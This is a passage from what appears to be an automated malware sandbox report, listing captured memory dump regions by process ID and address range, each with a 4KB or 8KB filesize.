                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3468-197-0x00000289B2B30000-0x00000289B2B32000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3468-234-0x00000289B2B36000-0x00000289B2B38000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3468-264-0x00000289B2B38000-0x00000289B2B39000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3508-203-0x000002BF56033000-0x000002BF56035000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3508-263-0x000002BF56038000-0x000002BF56039000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3508-242-0x000002BF56036000-0x000002BF56038000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3508-202-0x000002BF56030000-0x000002BF56032000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3876-260-0x000001A3EDA58000-0x000001A3EDA59000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3876-204-0x000001A3EDA50000-0x000001A3EDA52000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3876-205-0x000001A3EDA53000-0x000001A3EDA55000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3876-229-0x000001A3EDA56000-0x000001A3EDA58000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3896-116-0x000000001B380000-0x000000001B382000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3896-114-0x0000000000690000-0x0000000000691000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3964-185-0x0000028BFE866000-0x0000028BFE868000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3964-133-0x0000028BFE9F0000-0x0000028BFE9F1000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3964-131-0x0000028BFE860000-0x0000028BFE862000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/3964-127-0x0000028BFE7D0000-0x0000028BFE7D1000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3964-195-0x0000028BFE868000-0x0000028BFE869000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3964-132-0x0000028BFE863000-0x0000028BFE865000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4196-269-0x000001D872D78000-0x000001D872D79000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4196-221-0x000001D872D73000-0x000001D872D75000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4196-251-0x000001D872D76000-0x000001D872D78000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4196-220-0x000001D872D70000-0x000001D872D72000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4280-225-0x00000218D5070000-0x00000218D5072000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4280-253-0x00000218D5076000-0x00000218D5078000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4280-286-0x00000218D5078000-0x00000218D5079000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4280-226-0x00000218D5073000-0x00000218D5075000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4372-227-0x000002400F300000-0x000002400F302000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4372-254-0x000002400F306000-0x000002400F308000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4372-283-0x000002400F308000-0x000002400F309000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4372-228-0x000002400F303000-0x000002400F305000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4488-224-0x00000177BF2F3000-0x00000177BF2F5000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4488-222-0x00000177BF2F0000-0x00000177BF2F2000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4488-255-0x00000177BF2F6000-0x00000177BF2F8000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4488-285-0x00000177BF2F8000-0x00000177BF2F9000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/4568-336-0x000002D27E620000-0x000002D27E622000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4568-335-0x000002D27E623000-0x000002D27E625000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4768-313-0x000002657A010000-0x000002657A012000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4768-315-0x000002657A016000-0x000002657A018000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4768-314-0x000002657A013000-0x000002657A015000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/4988-332-0x000000001BBD0000-0x000000001BBD2000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB